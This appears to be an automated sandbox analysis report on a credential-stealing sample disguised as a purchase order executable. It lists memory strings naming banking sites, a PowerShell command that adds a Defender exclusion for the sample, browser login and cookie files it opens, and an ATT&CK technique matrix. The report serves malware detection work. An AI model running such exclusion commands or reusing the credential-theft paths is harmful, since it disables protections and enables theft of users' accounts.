                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                  Source: Purchase Order 007823-PO# 005307.exe, 00000000.00000002.1348947926.00000000007A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                  Source: Purchase Order 007823-PO# 005307.exe, 00000006.00000002.3793897853.0000000003CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeMemory written: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess created: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeProcess created: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe "C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeQueries volume information: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeQueries volume information: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3791088512.0000000002AD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\Purchase Order 007823-PO# 005307.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3791088512.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000006.00000002.3791088512.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.Purchase Order 007823-PO# 005307.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.417ca80.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.4073640.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Purchase Order 007823-PO# 005307.exe.40f8060.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3791088512.0000000002AD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3789747843.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1351236781.0000000003E4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7488, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Purchase Order 007823-PO# 005307.exe PID: 7704, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                  DLL Side-Loading
                  111
                  Process Injection
                  1
                  Masquerading
                  1
                  OS Credential Dumping
                  1
                  Security Software Discovery
                  Remote Services1
                  Email Collection
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading
                  11
                  Disable or Modify Tools
                  LSASS Memory1
                  Process Discovery
                  Remote Desktop Protocol11
                  Archive Collected Data
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                  Virtualization/Sandbox Evasion
                  Security Account Manager31
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares1
                  Data from Local System
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                  Process Injection
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture3
                  Ingress Tool Transfer
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information
                  LSA Secrets1
                  System Network Configuration Discovery
                  SSHKeylogging3
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                  Obfuscated Files or Information
                  Cached Domain Credentials1
                  File and Directory Discovery
                  VNCGUI Input Capture24
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                  Software Packing
                  DCSync13
                  System Information Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Timestomp
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  DLL Side-Loading
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
